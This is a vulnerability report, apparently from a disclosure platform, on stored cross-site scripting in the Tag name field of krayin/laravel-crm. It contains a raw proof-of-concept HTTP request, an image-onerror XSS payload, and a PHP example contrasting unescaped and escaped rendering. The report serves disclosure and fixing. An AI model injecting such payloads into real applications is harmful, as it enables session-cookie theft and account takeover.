Cross-site Scripting (XSS) - Stored in krayin/laravel-crm
Reported on Nov 29th 2021
Description
Stored XSS at Name of Tag
Detail
When the grid for Tags is rendered, the Name value is output without HTML escaping, so a stored tag name containing markup is executed as stored XSS.
Proof of Concept
// PoC.req
POST /admin/settings/tags/edit/1 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 126
Origin: http://127.0.0.1
Connection: keep-alive
Referer: http://127.0.0.1/admin/settings/tags/edit/1
Cookie: _ga=GA1.1.758235244.1637376300; PHPSESSID=2aj34hm8nmvep57jeno66ecbtn; XSRF-TOKEN=eyJpdiI6InFQWXVobjlWektDY2hZckcxZW9OMWc9PSIsInZhbHVlIjoiVDJ3blh5aGZOZlRaRGJqTUdCOGNnQm83RWN4K3RadWFQblpvMnloS1VVRkFxdGEreG9vUGlWbFdpVFVvTUM3a3NOM3ZiRTI0aCs5b0oxaGFzVVVOQ08vc1I4aHBaZHE1NUJtSVFVRStPR0ZPMUxncll6Um1hL21UVm5hd01KYysiLCJtYWMiOiIxYWM3NDc3Y2FhOWMzNjk3M2UxYTgxODYyMzgzMTJmZjc3MjEzYTI5NGE4ODI2NTIxNmE3ZWFlMDc3NjU5MTAxIn0%3D; krayin_crm_session=eyJpdiI6IjZXWG1PK1N3WVloY20ydjFTS0hROVE9PSIsInZhbHVlIjoiNHJLbzZrd2UwYm90QWE0SFhXcWMydmR2aDNHRUxLUGNMZjJYZGhDZE14QUdvUXk2dloxQjZocGltMUxQd0piSmRmM00rL2Q5cGV1bjdNeTV2cThZZFhmRkhzcmtpY25Zbm5KUWxkZkEvS2t5dUMyMFdRREdQUXdacEF2Y2VFQVMiLCJtYWMiOiJkNWY5NTRiMmZiOWE2ZTNiMjdkNjZiNzI2ZWI2MDg0NGU4ZGI4YTM3ZmNkM2Q5NzhiZTVjMzg0YmYwZTRiOWQ1In0%3D
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Pragma: no-cache
Cache-Control: no-cache
_token=nTihBpMW1L7emIz9py20nTTtNR7XV9H4At5rpuqc&_method=PUT&name=%22%3E%3CiMg+SrC%3D%22x%22+oNeRRor%3D%22alert%281%29%3B%22%3E
Steps to Reproduce
Go to Settings and choose Tags.
Choose Create Tag and enter the following payload in the Name input: "><iMg SrC="x" oNeRRor="alert(1);">
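To illustrate the Detail section, the following added example (not code from krayin/laravel-crm) renders a tag-name grid cell both unescaped and escaped, using the payload from this report; the function names and the $tag row are assumptions. In Blade terms, the unsafe version corresponds to {!! $name !!} and the safe one to {{ $name }}, which escapes via e().

```php
<?php
// Added example, not the project's own code. Shows why the Tag name must be
// HTML-escaped before it is placed into the grid markup.
declare(strict_types=1);

// Payload exactly as submitted in the PoC request above (URL-decoded).
const REPORTED_PAYLOAD = '"><iMg SrC="x" oNeRRor="alert(1);">';

// Escape a value for an HTML text or attribute context. ENT_QUOTES covers
// both quote styles so the value is also safe inside a quoted attribute.
function escapeHtml(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Vulnerable rendering: the stored name is concatenated straight into markup
// (equivalent to Blade's unescaped {!! $tag['name'] !!}).
function renderTagCellUnsafe(array $tag): string
{
    return '<td class="tag-name">' . $tag['name'] . '</td>';
}

// Fixed rendering: the same cell with the name escaped
// (equivalent to Blade's {{ $tag['name'] }}).
function renderTagCellSafe(array $tag): string
{
    return '<td class="tag-name">' . escapeHtml($tag['name']) . '</td>';
}

// Regression check: the cell must contain exactly the two tags the template
// itself emits (<td> and </td>); any extra tag came from the stored value.
function cellIsInert(string $html): bool
{
    return preg_match_all('/<[a-zA-Z\/]/', $html) === 2;
}

// Constructed sample row carrying the reported payload as its name.
$tag = ['id' => 1, 'name' => REPORTED_PAYLOAD];

foreach (['unsafe' => renderTagCellUnsafe($tag), 'safe' => renderTagCellSafe($tag)] as $mode => $html) {
    printf("%-6s inert=%s  %s\n", $mode, cellIsInert($html) ? 'yes' : 'no', $html);
}
```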
Impact
This vulnerability has the potential to steal a user's cookie and gain unauthorized access to that user's account through the stolen cookie.